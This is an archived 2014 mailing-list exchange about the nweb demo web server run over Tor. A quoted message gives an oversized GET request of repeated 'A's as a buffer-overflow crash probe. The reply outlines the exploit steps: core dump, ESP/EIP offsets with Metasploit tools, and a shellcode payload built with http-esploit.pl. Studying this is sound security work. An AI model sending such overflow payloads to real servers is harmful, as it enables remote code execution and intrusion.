[liberationtech] nweb + Tor
Jorge SoydelBierzo
berciano at soydelbierzo.com
Mon Jan 20 18:32:28 PST 2014
I've tested this several years ago, may be the get needs to be bigger for a
buffer overflow (over 1012 bytes, no matters if you use A, U or 5 ;-D)
When buffer overflow works, you can get a core dump file.
With ESP and EIP values in core dump, and patternOffset tool from
Metasploit, you can calculate word alignment, EIP offset, etc.
With ESP value, buffer size, ESP offset and generated shellcode, using
http-esploit.pl can make a payload to sent to nweb.
Nweb is a PoC, hope nobody uses it in the wild.
El martes, 21 de enero de 2014, Andrés Leopoldo Pacheco Sanfuentes <
alps6085 at gmail.com <javascript:_e({}, 'cvml', 'alps6085 at gmail.com');>>
escribió:
> On Mon, Jan 20, 2014 at 7:06 PM, Jonathan Wilkes <jancsika at yahoo.com>
> wrote:
> > GET
> >
> /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> > AAAAAAAAA
> >
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> > HTTP/1.0
>
>
> would it work the same if one replace the "A" for "U," for example? :D
>
> Best Regards | Cordiales Saludos | Grato,
>
> Andrés L. Pacheco Sanfuentes
> <alps at acm.org>
> +1 (817) 271-9619
> --
> Liberationtech is public & archives are searchable on Google. Violations
> of list guidelines will get you moderated:
> https://mailman.stanford.edu/mailman/listinfo/liberationtech.
> Unsubscribe, change to digest, or change password by emailing moderator at
> companys at stanford.edu.
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mailman.stanford.edu/pipermail/liberationtech/attachments/20140121/e5b0e061/attachment.html>
More information about the liberationtech
mailing list